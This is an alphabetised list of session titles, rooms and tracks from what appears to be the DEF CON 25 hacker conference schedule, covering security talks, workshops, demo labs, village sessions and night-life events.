Wireless-Florentine BR I & II - Promenade Level-A Pineapple, a Turtle, a Bunny, and a Squirrel walk into a bar.
SEV-Emperors BR II-….Not lose the common touch
DEFCON-Track 4-Abusing Certificate Transparency Logs
CHV-Village Talks Outside Contest Area, Pool Level-Abusing Smart Cars with QR codes
DEFCON-Track 1-Abusing Webhooks for Command and Control
SKY-Verona/Tuin/Trevi - Promenade Level-Advanced DNS Exfil
PHW-Neopolitan BR IV - Promenade Level-Advanced Implant Detection with Bro & PacketSled
Demolabs-Table 1-Advanced Spectrum Monitoring with ShinySDR
Workshops-Octavius 7-Advanced Wireless Attacks Against Enterprise Networks
CPV-Florentine Ballroom 4-Alice and Bob are Slightly Less Confused
SKY-Verona/Tuin/Trevi - Promenade Level-All The Sales President's Men
DEFCON-Track 4-All Your Things Are Belong To Us
DEFCON-Track 1-Amateur Digital Archeology
DEFCON-Track 3-An ACE Up the Sleeve: Designing Active Directory DACL Backdoors
PHW-Neopolitan BR IV - Promenade Level-An Intro to Hunting with Splunk
PHW-Neopolitan BR IV - Promenade Level-An Intro to Hunting with Splunk
RCV-Palermo room, Promenade level-An Introduction to Graph Theory for OSINT
Demolabs-Table 3-Android Tamer
Workshops-Octavius 7-Applied Physical Attacks on Embedded Systems, Introductory Version
SEV-Emperors BR II-Are you Killing your security program?
DEFCON-Track 1-Assembly Language is Too High Level
RCV-Palermo room, Promenade level-Attack Surface Discovery with Intrigue
Workshops-Octavius 4-Attacking Active Directory and Advanced Methods of Defense
Workshops-Octavius 5-Attacking and Defending 802.11ac Networks
DEFCON-Track 1-Attacking Autonomic Networks
CHV-Village Talks Outside Contest Area, Pool Level-Attacking Wireless Interfaces in Vehicles
CPV-Florentine Ballroom 4-Automated Testing using Crypto Differential Fuzzing (DO NOT RECORD)
Wireless-Florentine BR I & II - Promenade Level-Automating Physical Home Security Through Hacking
CHV-Village Talks Outside Contest Area, Pool Level-Autosar SecOC – Secure On-Board Comms
PHV-Milano VIII - Promenade Level-AWS Persistence and Lateral Movement Techniques
DEFCON-Track 2-Backdooring the Lottery and Other Security Tales in Gaming over the Past 25 Years
SEV-Emperors BR II-Beyond Phishing - Building and Sustaining a Corporate SE Program
BHV-Pisa Room-Biohackers Die
BHV-Pisa Room-Biohacking Street Law
BHV-Pisa Room-Biohacking: The Moral Imperative to Build a Better You
BHV-Pisa Room-Biotechnology Needs a Security Patch...Badly
DEFCON-Track 3-BITSInject
Night Life-Octavius 3&4-Blanketfort Con
BHV-Pisa Room-Blockchain's Role in the Disruption of the Medical Industry
CPV-Florentine Ballroom 4-Blue Team TLS Hugs
Workshops-Octavius 4-Brainwashing Embedded Systems
DEFCON-Track 3-Breaking Bitcoin Hardware Wallets
DEFCON-Track 3-Breaking the x86 Instruction Set
CPV-Florentine Ballroom 4-Breaking TLS: A Year in Incremental Privacy Improvements
DEFCON-Track 1-Breaking Wind: Adventures in Hacking Wind Farm Control Networks
VMHV-Roman 1, Promenade Level-Brief history of election machine hacking and lessons learned so far and why it is hard to tell the difference between incompetence and malice.
Demolabs-Table 5-Bropy
Workshops-Octavius 7-Build your stack with Scapy, for fun and profit
Workshops-Octavius 5-Building Application Security Automation with Python
RCV-Palermo room, Promenade level-Building Google For Criminal Enterprises
Demolabs-Table 2-bullDozer
RCV-Palermo room, Promenade level-Burner Phone Challenge
DEFCON-Track 2-Bypassing Android Password Manager Apps Without Root
DEFCON-Track 3-CableTap: Wirelessly Tapping Your Home Network
DEFCON-Track 1-Call the plumber - you have a leak in your (named) pipe
SKY-Verona/Tuin/Trevi - Promenade Level-Catch me leaking your data... if you can...
Demolabs-Table 3-CellAnalysis
SEV-Emperors BR II-Change Agents: How to Effectively Influence Intractable Corporate Cultures
SKY-Verona/Tuin/Trevi - Promenade Level-Child Abuse Material, Current Issues Trends & Technologies
DEFCON-Track 1-Cisco Catalyst Exploitation
DEFCON-Track 1-CITL and the Digital Standard - A Year Later
VMHV-Roman 1, Promenade Level-Common misconceptions and false parallels about voting technology. We can do online banking and use ATMs, why cant we vote on touch screens or online?
BHV-Pisa Room-Computational Chemistry on a Budget
DEFCON-Track 1-Controlling IoT devices with crafted radio signals
CPV-Florentine Ballroom 4-Core Illumination: Traffic Analysis in Cyberspace
Demolabs-Table 3-CrackMapExec
BHV-Pisa Room-Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science
SKY-Verona/Tuin/Trevi - Promenade Level-Crossing the Border with a Burner Phone: A Lawyer Explains Legal & Security Issues at the Border
Demolabs-Table 4-Crypt-Keeper
CPV-Florentine Ballroom 4-Cryptanalysis in the Time of Ransomware
PHV-Milano VIII - Promenade Level-CVE IDs and How to Get Them
CPV-Florentine Ballroom 4-Cypherpunks History
DEFCON-Modena Room-D0 No H4RM: A Healthcare Security Conversation
BHV-Pisa Room-Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode
DEFCON-Track 3-Dark Data
DEFCON-Capri Room-DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd
DEFCON-Track 1-DC to DEF CON: Q&A with Congressmen James Langevin and Will Hurd
DEFCON-Track 1-Dealing the perfect hand - Shuffling memory blocks on z/OS
DEFCON-Track 2-Death By 1000 Installers; on macOS, it's all broken!
SKY-Verona/Tuin/Trevi - Promenade Level-Death Numbers in Surgical room, Attacking Anesthesia Equipment.
Wireless-Florentine BR I & II - Promenade Level-Deceptacon: Wi-Fi Deception in under $5
DEFCON-Track 1-DEF CON 101 Panel
Night Life-Track 3-DEF CON Movie Night
Night Life-Track 3-DEF CON Movie Night
Night Life-Track 3-DEF CON Movie Night
Night Life-Lobby Bar-DEFCON 25 Meetup for /r/Defcon
Night Life-Sunset Park Pavilion F-DEFCON Toxic BBQ
CHV-Village Talks Outside Contest Area, Pool Level-DefCon Unofficial Badges Panel
PHV-Milano VIII - Promenade Level-Demystifying the OPM breach, WTF really happened
DEFCON-Track 1-Demystifying Windows Kernel Exploitation by Abusing GDI Objects.
BHV-Pisa Room-Designer Babies
Wireless-Florentine BR I & II - Promenade Level-Designing an Automatic Gain Control
DEFCON-Track 4-Digital Vengeance: Exploiting the Most Notorious C&C Toolkits
ICS-Calibria-Dissecting industrial wireless implementations.
BHV-Pisa Room-DIYBioweapons and Regulation
DEFCON-Track 3-DNS - Devious Name Services - Destroying Privacy & Anonymity Without Your Consent
Demolabs-Table 2-DNS-Exfil-Suite
RCV-Palermo room, Promenade level-Do Tinder Bots Dream of Electric Toys? How Tinder Bots are breaking hearts all over the world, and trashing Tinder’s reputation while they’re at it.
RCV-Palermo room, Promenade level-Domain Discovery: Expanding your scope like a boss
DEFCON-Track 3-DOOMed Point of Sale Systems
DEFCON-Track 1-Driving down the rabbit hole
Night Life-Track 2-Drunk Hacker History
Demolabs-Table 5-EAPHammer
Workshops-Octavius 5-Edge cases in web hacking
DEFCON-Track 4-Evading next-gen AV using artificial intelligence
SKY-Verona/Tuin/Trevi - Promenade Level-Everything you wanted to know about orchestration but were afraid to ask.
Workshops-Octavius 5-Exploitation/Malware Forward Engineering
DEFCON-Track 2-Exploiting 0ld Mag-stripe information with New technology
DEFCON-Track 3-Exploiting Continuous Integration (CI) and Automated Build systems
Wireless-Florentine BR I & II - Promenade Level-Failsafe: Yet Another SimplySafe Attack Vector
SKY-Verona/Tuin/Trevi - Promenade Level-FERPA - Only Your Grades Are Safe; OSINT in Higher Education
RCV-Palermo room, Promenade level-FERPA: Only Your Grades Are Safe; OSINT In Higher Education
SKY-Verona/Tuin/Trevi - Promenade Level-Financial Crime 2.0
PHV-Milano VIII - Promenade Level-Fooling the Hound: Deceiving Domain Admin Hunters
PHV-Milano VIII - Promenade Level-Fortune 100 InfoSec on a State Government Budget
Workshops-Octavius 6-Free and Easy DFIR Triage for Everyone: From Collection to Analysis
DEFCON-Track 4-Friday the 13th: JSON attacks!
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
BillW-Office 4A on Promenade Level-Friends of Bill W
DEFCON-Track 2-From "One Country - One Floppy" to "Startup Nation" - the story of the early days of the Israeli hacking community, and the journey towards today's vibrant startup scene
DEFCON-Track 1-From Box to Backdoor: Using Old School Tools and Techniques to Discover Backdoors in Modern Devices
IOT-Main Contest Area-From DVR worms, to fridges, via dildos, the sins of the IoT in 50 minutes
IOT-Main Contest Area-From FAR and NEAR: Exploiting Overflows on Windows 3.x
SKY-Verona/Tuin/Trevi - Promenade Level-From OPSUCK to OPSEXY: An OPSEC Primer
ICS-Calibria-Fun with Modbus function code 90.
Demolabs-Table 1-Fuzzapi
DEFCON-Track 1-Game of Chromes: Owning the Web with Zombie Chrome Extensions
DEFCON-Track 4-Game of Drones: Putting the Emerging "Drone Defense" Market to the Test
DEFCON-Track 4-Genetic Diseases to Guide Digital Hacks of the Human Genome: How the Cancer Moonshot Program will Enable Almost Anyone to Crash the Operating System that Runs You or to End Civilization...
DEFCON-Track 3-Get-$pwnd: Attacking Battle-Hardened Windows Server
DEFCON-Track 4-Ghost in the Droid: Possessing Android Applications with ParaSpectre
Demolabs-Table 2-GibberSense
PHV-Milano VIII - Promenade Level-Go Beyond Tabletop Scenarios by Building an Incident Response Simulation Platform
Wireless-Florentine BR I & II - Promenade Level-GODUMP-NG packet sniffing the Gotenna
Demolabs-Table 3-GoFetch
CHV-Village Talks Outside Contest Area, Pool Level-GPS System Integrity
CHV-Village Talks Outside Contest Area, Pool Level-Grand Theft Radio (Stopping SDR Relay Attacks on PKES)
Demolabs-Table 3-GreatFET
ICS-Calibria-Grid insecurity - and how to really fix this shit
Night Life-Octavius 5-8-GRIMM's AWESOME Arcade Party
Demolabs-Table 2-Gumbler
SKY-Verona/Tuin/Trevi - Promenade Level-Gun control - You cant put the Genie back into its bottle
Night Life-Track 2-Hacker Jeopardy
Night Life-Track 2-Hacker Jeopardy
Night Life-Roman 1, Promenade Level-Hacker Karaoke
Night Life-Roman 1, Promenade Level-Hacker Karaoke
SEV-Emperors BR II-Hackers gonna hack - But do they know why?
DEFCON-Track 4-Hacking Democracy: A Socratic Dialogue
DEFCON-Capri Room-Hacking Democracy
Workshops-Octavius 1-Hacking Network Protocols using Kali
CPV-Florentine Ballroom 4-Hacking on Multiparty Computation
DEFCON-Track 3-Hacking Smart Contracts
Wireless-Florentine BR I & II - Promenade Level-Hacking Some More of The Wireless World
DEFCON-Track 1-Hacking the Cloud
SKY-Verona/Tuin/Trevi - Promenade Level-Hacking the Law: A Call for Action Bug Bounties Legal Terms as a Case Study
BHV-Pisa Room-Hacking the Second Genetic Code using Information Theory
DEFCON-Track 2-Hacking travel routers like it's 1999
Workshops-Octavius 7-Harnessing the Power of Docker and Kubernetes to Supercharge Your Hacking Tactics
CPV-Florentine Ballroom 4-Have you seen my naked selfies? Neither has my snoopy boyfriend. Privacy within a Relationship
BHV-Pisa Room-Health as a service...
SEV-Emperors BR II-Heavy Diving for Credentials: Towards an Anonymous Phishing
DEFCON-Track 1-Here to stay: Gaining persistency by abusing advanced authentication mechanisms
Demolabs-Table 6-HI-Jack-2Factor
IOT-Main Contest Area-Hide Yo Keys, Hide Yo Car - Remotely Exploiting Connected Vehicle APIs and Apps
DEFCON-Modena-Horror stories of a translator and how a tweet can start a war with less than 140 characters
VMHV-Roman 1, Promenade Level-How did we get here: A history of voting technology, hanging chads, and the Help America Vote Act. This segment will feature a punch card machine and demo what can go wrong with it.
PHV-Milano VIII - Promenade Level-How Hackers Changed The Security Industry
ICS-Calibria-How to create dark buildings with light speed.
RCV-Palermo room, Promenade level-How to obtain 100 Facebooks accounts per day through internet searches
SEV-Emperors BR II-How to protect your banks & enterprises (Talk given by someone who robs banks & enterprises)
BHV-Pisa Room-How to use the Scientific Method in Security Research
DEFCON-Track 4-How we created the first SHA-1 collision and what it means for hash security
BHV-Pisa Room-How your doctor might be trying to kill you and how personal genomics can save your life
Demolabs-Table 2-https://crack.sh/
Night Life-Octavius 1&2-Human Zoo
BHV-Pisa Room-Human-Human Interface
SKY-Verona/Tuin/Trevi - Promenade Level-HUMSEC (or how I learned to hate my phone)
PHV-Milano VIII - Promenade Level-Hunting Down the Domain Admin and Rob Your Network
DEFCON-Track 2-I Know What You Are by the Smell of Your Wifi
ICS-ICS-Village-ICS SCADA Forensics workshop/challenge
DEFCON-Track 3-If You Give a Mouse a Microchip... It will execute a payload and cheat at your high-stakes video game tournament
IOT-Main Contest Area-IIDS: An Intrusion Detection System for IoT
BHV-Pisa Room-Implants: Show and Tell
ICS-Octavius 6-Industrial Control System Security 101 and 201- SOLD OUT
Workshops-Octavius 6-Industrial Control System Security 101 and 201
Night Life-Turin, Promenade Level-INFOSEC UNLOCKED
CHV-Village Talks Outside Contest Area, Pool Level-Insecure By Law
DEFCON-Track 1-Inside the "Meet Desai" Attack: Defending Distributed Targets from Distributed Attacks
IOT-Main Contest Area-Inside the Alaris Infusion Pump, not too much medication por favor!
IOT-Main Contest Area-Intelligent Misusers: A Case for Adversarial Modelling on IoT Devices
RCV-Palermo room, Promenade level-Into the Bird’s Nest: A Comprehensive Look at Twitter as a Research Tool
RCV-Palermo room, Promenade level-Intro to OSINT: Zero on the way to Hero
DEFCON-Track 3-Introducing HUNT: Data Driven Web Hacking & Manual Testing
PHW-Neopolitan BR IV - Promenade Level-Introducing Mallet: An Intercepting Proxy for Arbitrary Protocols
VMHV-Roman 1, Promenade Level-Introduction into hacking the equipment in the village.
PHW-Neopolitan BR IV - Promenade Level-Introduction to 802.11 Packet Dissection
PHW-Neopolitan BR IV - Promenade Level-Introduction to 802.11 Packet Dissection
Workshops-Octavius 6-Introduction to Cryptographic Attacks
Workshops-Octavius 6-Introduction to Practical Network Signature Development for Open Source IDS
ICS-ICS-Village-Introduction to the ICS Wall
Workshops-Octavius 5-Introduction to x86 disassembly
IOT-Main Contest Area-IoT - the gift that keeps on giving
BHV-Pisa Room-IoT of Dongs
IOT-Main Contest Area-IoT updates to help protect consumers
IOT-Main Contest Area-IoT Village Keynote - Friends, Not Foes: Rethinking the Researcher-Vendor Relationship
PHV-Milano VIII - Promenade Level-IP Spoofing
PHV-Milano VIII - Promenade Level-Iron Sights for Your Data
SKY-Verona/Tuin/Trevi - Promenade Level-Its Not Just the Elections!
RCV-Palermo room, Promenade level-It’s Going To Get Worse Before It Gets Better - The Future of Recon Data Mining
DEFCON-Track 2-Jailbreaking Apple Watch
PHW-Neopolitan BR IV - Promenade Level-Jailing Programs with Linux Containers
PHW-Neopolitan BR IV - Promenade Level-Jailing Programs with Linux Containers
DEFCON-Track 2-Koadic C3 - Windows COM Command & Control Framework
Demolabs-Table 1-LAMMA 1.0
Wireless-Florentine BR I & II - Promenade Level-Large Scale Wireless Monitoring - KISMET packet sniffer on a multi-radio array
Night Life-Counsel Boardroom, Promenade Level-Lawyer Meetup
PHV-Milano VIII - Promenade Level-Layer 8 and Why People are the Most Important Security Tool
SKY-Verona/Tuin/Trevi - Promenade Level-Lessons From An Incident Responder AKA, Stories Of When Shit Goes Sideways
Demolabs-Table 4-Leviathan Framework
Workshops-Octavius 1-Linux Lockdown: ModSecurity and AppArmor
CHV-Village Talks Outside Contest Area, Pool Level-Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles
DEFCON-Track 3-Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles
DEFCON-Track 1-macOS/iOS Kernel Debugging and Heap Feng Shui
PHV-Milano VIII - Promenade Level-Make Your Own 802.11ac Monitoring Hacker Gadget
DEFCON-Track 3-Malicious CDNs: Identifying Zbot Domains en Masse via SSL Certificates and Bipartite Graphs
Demolabs-Table 5-Maltego "Have I been pwned?"
Workshops-Octavius 1-Malware Triage: Malscripts Are The New Exploit Kit
DEFCON-Track 3-Man in the NFC
IOT-Main Contest Area-Manufactures Panel
DEFCON-Track 3-MEATPISTOL, A Modular Malware Implant Framework
BHV-Pisa Room-Microscopes are Stupid
DEFCON-Track 1-Microservices and FaaS for Offensive Security
BHV-Pisa Room-Might as well name it Parmigiana, American, Cheddar, and Swiss
Workshops-Octavius 6-Mobile App Attack 2.0
DEFCON-Track 1-MS Just Gave the Blue Team Tactical Nukes (And How Red Teams Need To Adapt)
BHV-Pisa Room-My dog is a hacker and will steal your data!
Demolabs-Table 1-Mycroft
Night Life-Track 4-n00b Party hosted by Duo Security.
BHV-Pisa Room-Neuro Ethics
BHV-Pisa Room-Neurogenic Peptides: Smart Drugs 4-Minute Mile
SKY-Verona/Tuin/Trevi - Promenade Level-Neutrality? We don't need no stinkin' Neutrality
DEFCON-Track 4-Next-Generation Tor Onion Services
DEFCON-Track 1-Offensive Malware Analysis: Dissecting OSX/FruitFly via a Custom C&C Server
Night Life-Track 1-Official DEF CON Welcome Party
Night Life-Track 1 & Chillout lounges-Official Entertainment: ACID T
Night Life-Track 1 & Chillout lounges-Official Entertainment: CTRL/RSM
Night Life-Track 1 & Chillout lounges-Official Entertainment: DJDEAD
Night Life-Track 1 & Chillout lounges-Official Entertainment: DUALCORE
Night Life-Track 1 & Chillout lounges-Official Entertainment: JACKALOPE
Night Life-Track 1 & Chillout lounges-Official Entertainment: KILL THE NOISE
Night Life-Track 1 & Chillout lounges-Official Entertainment: KRISZ KLINK
Night Life-Track 1 & Chillout lounges-Official Entertainment: LEFT/RIGHT
Night Life-Track 1 & Chillout lounges-Official Entertainment: MC FRONTALOT
Night Life-Track 1 & Chillout lounges-Official Entertainment: MODERNS
Night Life-Track 1 & Chillout lounges-Official Entertainment: NINJULA
Night Life-Track 1 & Chillout lounges-Official Entertainment: REEL BIG FISH
Night Life-Track 1 & Chillout lounges-Official Entertainment: REID SPEED
Night Life-Track 1 & Chillout lounges-Official Entertainment: Richard Cheese
Night Life-Track 1 & Chillout lounges-Official Entertainment: SCOTCH AND BUBBLES
Night Life-Track 1 & Chillout lounges-Official Entertainment: SKITTISH AND BUS
Night Life-Track 1 & Chillout lounges-Official Entertainment: YT CRACKER
Night Life-Track 1 & Chillout lounges-Official Entertainment: ZEBBLER ENCANTI
SKY-Verona/Tuin/Trevi - Promenade Level-One-click Browser Defense
DEFCON-Track 2-Open Source Safe Cracking Robots - Combinations Under 1 Hour! (Is it bait? Damn straight it is.)
CPV-Florentine Ballroom 4-Operational Security Lessons from the Dark Web
DEFCON-Track 2-Opt Out or Deauth Trying !- Anti-Tracking Bots Radios and Keystroke Injection
RCV-Palermo room, Promenade level-OSINT Tactics on Source Code & Developers
DEFCON-Trevi Room-Panel - An Evening with the EFF
DEFCON-Capri Room-Panel - Meet the Feds (who care about security research)
DEFCON-Track 2-Panel: DEF CON Groups
DEFCON-Track 4-Panel: Meet The Feds
VMHV-Roman 1, Promenade Level-Panel: Securing the Election Office: A Local Response to a Global Threat
PHV-Milano VIII - Promenade Level-Passwords on a Phone
PHV-Milano VIII - Promenade Level-Past, Present and Future of High Speed Packet Filtering on Linux
Demolabs-Table 3-PCILeech
DEFCON-Track 2-PEIMA (Probability Engine to Identify Malicious Activity): Using Power Laws to address Denial of Service Attacks
Workshops-Octavius 1-Penetration Testing in Hostile Environments: Client & Tester Security
DEFCON-Track 1-Persisting with Microsoft Office: Abusing Extensibility Options
DEFCON-Track 2-Phone system testing and other fun tricks
Demolabs-Table 6-PIV OPACITY
Wireless-Florentine BR I & II - Promenade Level-POCSAG Amateur Pager Network
DEFCON-Track 4-Popping a Smart Gun
DEFCON-Track 1-Porosity: A Decompiler For Blockchain-Based Smart Contracts Bytecode
Workshops-Octavius 1-Practical BLE Exploitation for Internet of Things
Workshops-Octavius 7-Practical Malware Analysis: Hands-On
Workshops-Octavius 4-Principals on Leveraging PowerShell for Red Teams
CPV-Florentine Ballroom 4-Privacy is Not An Add-On: Designing for Privacy from the Ground Up
Demolabs-Table 1-probespy
CPV-Florentine Ballroom 4-Protecting Users' Privacy in a Location-Critical Enterprise: The Challenges of 9-1-1 Location
BHV-Pisa Room-Psychoactive Chemicals in Combat
Workshops-Octavius 6-Pwning machine learning systems
IOT-Main Contest Area-Pwning the Industrial IoT: RCEs and backdoors are around!
Demolabs-Table 6-Radare2
DEFCON-Track 1-Radio Exploitation 101: Characterizing, Contextualizing, and Applying Wireless Attack Methods
DEFCON-Track 1-Rage Against the Weaponized AI Propaganda Machine
DEFCON-Track 2-Real-time RFID Cloning in the Field
RCV-Palermo room, Promenade level-Recon and bug bounties what a great love story
IOT-Main Contest Area-Redesigning PKI for IoT because Crypto is Hard
Wireless-Florentine BR I & II - Promenade Level-Reverse Engineering DSSS Extended Cut
PHW-Neopolitan BR IV - Promenade Level-Reverse Engineering Malware 101
BHV-Pisa Room-Reversing Your Own Source Code
DEFCON-Track 4-Revoke-Obfuscation: PowerShell Obfuscation Detection (And Evasion) Using Science
SKY-Verona/Tuin/Trevi - Promenade Level-Robbing the network and ways to get there
HHV-Main Contest Area, Pool Level-Robo-Sumo
SKY-Verona/Tuin/Trevi - Promenade Level-Rockin' the (vox)Vote
Demolabs-Table 4-Ruler - Pivoting Through Exchange
CPV-Florentine Ballroom 4-rustls: modern, fast, safer TLS
Demolabs-Table 5-SamyKam
Workshops-Octavius 4-Scanning the Airwaves: building a cheap trunked radio/pager scanning system
Workshops-Octavius 7-SDR Crash Course: Hacking your way to fun and profit
SEV-Emperors BR II-SE vs Predator: Using Social Engineering in ways I never thought…
DEFCON-Track 4-Secret Tools: Learning about Government Surveillance Software You Can't Ever See
DEFCON-Track 2-Secure Tokin' and Doobiekeys: How to roll your own counterfeit hardware security devices
CPV-Florentine Ballroom 4-Security Analysis of the Telegram IM
DEFCON-Track 2-See no evil, hear no evil: Hacking invisibly and silently with light and sound
BHV-Pisa Room-Sensory Augmentation 101
PHW-Neopolitan BR IV - Promenade Level-Serious Intro to Python for Admins
PHW-Neopolitan BR IV - Promenade Level-Serious Intro to Python for Admins
VMHV-Roman 1, Promenade Level-Session on legal considerations of hacking election machines.
CPV-Florentine Ballroom 4-SHA-3 vs the world
Demolabs-Table 6/Five-ShinoBOT Family
Demolabs-Table 6/Five-ShinoBOT Family
Wireless-Florentine BR I & II - Promenade Level-SIGINT for the Rest of US
Night Life-Modena, Promenade level-Silent Disco : Party like a Hacker
SEV-Emperors BR II-Skills For A Red-Teamer
RCV-Palermo room, Promenade level-Skip tracing for fun and profit
SEV-Emperors BR II-Social Engineering with Web Analytics
Demolabs-Table 6-Splunking Dark Tools - A Pentesters Guide to Pwnage Visualization
BHV-Pisa Room-Standardizing the Secure Deployment of Medical Devices
DEFCON-Track 3-Starting the Avalanche: Application DoS In Microservice Architectures
PHV-Milano VIII - Promenade Level-Stories from a 15 days SMB Honeypot: Mum, Tons of WannaCry and Evils Attacked Our Home!
PHV-Milano VIII - Promenade Level-Strengthen Your SecOps Team by Leveraging Neurodiversity
Workshops-Octavius 5-Subverting Privacy Exploitation Using HTTP
Wireless-Florentine BR I & II - Promenade Level-Suitcase Repeater Build for UHF - 70cm
DEFCON-Track 2-Taking Windows 10 Kernel Exploitation to the next level - Leveraging write-what-where vulnerabilities in Creators Update
BHV-Pisa Room-Tales from a healthcare hacker
BHV-Pisa Room-tDCS workshop
DEFCON-Track 2-Teaching Old Shellcode New Tricks
CHV-Village Talks Outside Contest Area, Pool Level-That’s no car. It’s a network!
DEFCON-Track 2-The Adventures of AV and the Leaky Sandbox
SKY-Verona/Tuin/Trevi - Promenade Level-The Automation and Commoditization of Infosec
CHV-Village Talks Outside Contest Area, Pool Level-The Bicho: An Advanced Car Backdoor Maker
BHV-Pisa Room-The Bitcoin DNA Challenge
DEFCON-Track 1-The Black Art of Wireless Post Exploitation
PHV-Milano VIII - Promenade Level-The Black Art of Wireless Post-Exploitation: Bypassing Port-Based Access Controls Using Indirect Wireless Pivots
DEFCON-Track 3-The Brain's Last Stand
BHV-Pisa Room-The Brave New World of Bio-Entrepreneurship
DEFCON-Track 3-The call is coming from inside the house! Are you ready for the next evolution in DDoS attacks?
BHV-Pisa Room-The collision of prosthetics, robotics and the human interface
BHV-Pisa Room-The Future is Fake Identities
ICS-Calibria-The gap in ICS Cyber security - Cyber security of Level 1 Field devices.
SEV-Emperors BR II-The Human Factor: Why Are We So Bad at Security and Risk Assessment?
DEFCON-Track 4-The Internet Already Knows I'm Pregnant
IOT-Main Contest Area-The Internet of Vulnerabilities
PHW-Neopolitan BR IV - Promenade Level-The Kali Linux Dojo - Angela Could Have Done Better
CPV-Florentine Ballroom 4-The Key Management Facility of the Root Zone DNSSEC KSK
DEFCON-Track 2-The Last CTF Talk You'll Ever Need: AMA with 20 years of DEF CON Capture-the-Flag organizers
BHV-Pisa Room-The Patient as CEO
CPV-Florentine Ballroom 4-The Policy & Business Case for Privacy By Design
BHV-Pisa Room-The Rise of Digital Medicine: At-home digital clinical research
DEFCON-Track 4-The spear to break the security wall of S7CommPlus
CPV-Florentine Ballroom 4-The Surveillance Capitalism Will Continue Until Morale Improves
CPV-Florentine Ballroom 4-The Symantec/Chrome SSL debacle - how to do this better...
CPV-Florentine Ballroom 4-The Why and How for Secure Automatic Patch Management
SEV-Emperors BR II-Thematic Social Engineering
DEFCON-Track 1-There's no place like 127.0.0.1 - Achieving reliable DNS rebinding in modern browsers
PHV-Milano VIII - Promenade Level-Threat Intel for All: There's More to Your Data Than Meets the Eye
DEFCON-Track 1-Total Recall: Implanting Passwords in Cognitive Memory
BHV-Pisa Room-Total Recall: Implanting Passwords in Cognitive Memory
RCV-Palermo room, Promenade level-Total Recoll: Conducting Investigations without Missing a Thing
DEFCON-Track 2-Tracking Spies in the Skies
SKY-Verona/Tuin/Trevi - Promenade Level-Trauma in Healthcare IT: My Differential Diagnosis and Call to Action
BHV-Pisa Room-Trigraph: An Ethereum-based Teleradiology Application
DEFCON-Track 2-Trojan-tolerant Hardware & Supply Chain Security in Practice
Demolabs-Table 2-Trueseeing: Effective Dataflow Analysis over Dalvik Opcodes
CHV-Village Talks Outside Contest Area, Pool Level-Turbo Talks – Getting Started With CarHacking, k-Line Hacking
DEFCON-Track 3-Twenty Years of MMORPG Hacking: Better Graphics, Same Exploits
Workshops-Octavius 4-UAC 0day, all day!
DEFCON-Track 1-Unboxing Android: Everything you wanted to know about Android packers
CPV-Florentine Ballroom 4-Unfairplay (NOT RECORDED)
Demolabs-Table 4-Universal Serial aBUSe
DEFCON-Track 4-Untrustworthy Hardware and How to Fix It
RCV-Palermo room, Promenade level-Up close and personal - Keeping an eye on mobile applications
ICS-ICS-Village-Using Alexa for your Control System environment
RCV-Palermo room, Promenade level-Using DFIR Orchestration and Automation Tools and Playbooks For OSINT and Recon
DEFCON-Track 1-Using GPS Spoofing to control time
RCV-Palermo room, Promenade level-Using phonetic algorithms to increase your search space and detect misspellings.
Demolabs-Table 6-Vapor Trail
VMHV-Roman 1, Promenade Level-Verified Voting
PHV-Milano VIII - Promenade Level-Visual Network and File Forensics
DEFCON-Track 2-Weaponizing Machine Learning: Humanity Was Overrated Anyway
DEFCON-Track 2-Weaponizing the BBC Micro:Bit
DEFCON-Track 2-Welcome to DEF CON 25
ICS-ICS-Village-Welcome to the ICS Village
VMHV-Roman 1, Promenade Level-What are the national security implications of cyber attacks on our voting systems? What are the motivations of our adversaries, and how should the U.S. respond to the threat?
ICS-Calibria-What's the DFIRence for ICS?
DEFCON-Track 2-When Privacy Goes Poof! Why It's Gone and Never Coming Back
PHV-Milano VIII - Promenade Level-When the Current Ransomware and Payload of the Day (CRAP of the day) Hits the Fan: Breaking the Bad News
DEFCON-Track 2-Where are the SDN Security Talks?
Night Life-Track 4-Whose Slide is it anyway?
Night Life-Track 4-Whose Slide is it anyway?
Demolabs-Table 5-WIDY 2.0: WIFI 0WNAGE IN UNDER $5 RELOADED
Demolabs-Table 4-WiFi Cactus
Demolabs-Table 4-WiFi Cactus
Wireless-Florentine BR I & II - Promenade Level-WIGLE Like You Mean It
Demolabs-Table 1-WiMonitor - an OpenWRT package for remote WiFi sniffing
Workshops-Octavius 4-Windows - The Undiscovered country
DEFCON-Track 2-Wiping out CSRF
Wireless-Florentine BR I & II - Promenade Level-Wireless Threat Modeling and Monitoring - WiNT
Night Life-The Nobu Hotel in Caesars Palace-Women, Wisdom & Wine
HHV-Main Contest Area, Pool Level-Workshop: Component Desoldering and Recovery
HHV-Main Contest Area, Pool Level-Workshop: Component Desoldering and Recovery
HHV-Main Contest Area, Pool Level-Workshop: Component Desoldering and Recovery
HHV-Main Contest Area, Pool Level-Workshop: Component Desoldering and Recovery
CPV-Florentine Ballroom 3-WS: Breaking the Uber Badge Ciphers
CPV-Florentine Ballroom 3-WS: FeatherDuster and Cryptanalib workshop
CPV-Florentine Ballroom 3-WS: Implementing An Elliptic Curve in Go
CPV-Florentine Ballroom 3-WS: Mansion Apartment Shack House: How To Explain Crypto To Practically Anyone
CPV-Florentine Ballroom 3-WS: NoiseSocket: Extending Noise to Make Every TCP Connection Secure
CPV-Florentine Ballroom 3-WS: Reasoning about Consensus Algorithms
CPV-Florentine Ballroom 3-WS: Secrets Management in the Cloud
CPV-Florentine Ballroom 3-WS: SECURE COMMUNICATIONS IN ANDROID WITH TLS/SSL
CPV-Florentine Ballroom 3-WS: Supersingular Isogeny Diffie-Hellman
DEFCON-Track 3-WSUSpendu: How to hang WSUS clients
DEFCON-Track 4-XenoScan: Scanning Memory Like a Boss
PHV-Milano VIII - Promenade Level-XSS FTW - What Can Really Be Done With Cross-Site Scripting
PHV-Milano VIII - Promenade Level-YALDA – Large Scale Data Mining for Threat Intelligence
CPV-Florentine Ballroom 4-Yet another password hashing talk
PHV-Milano VIII - Promenade Level-You're Going to Connect to the Wrong Domain

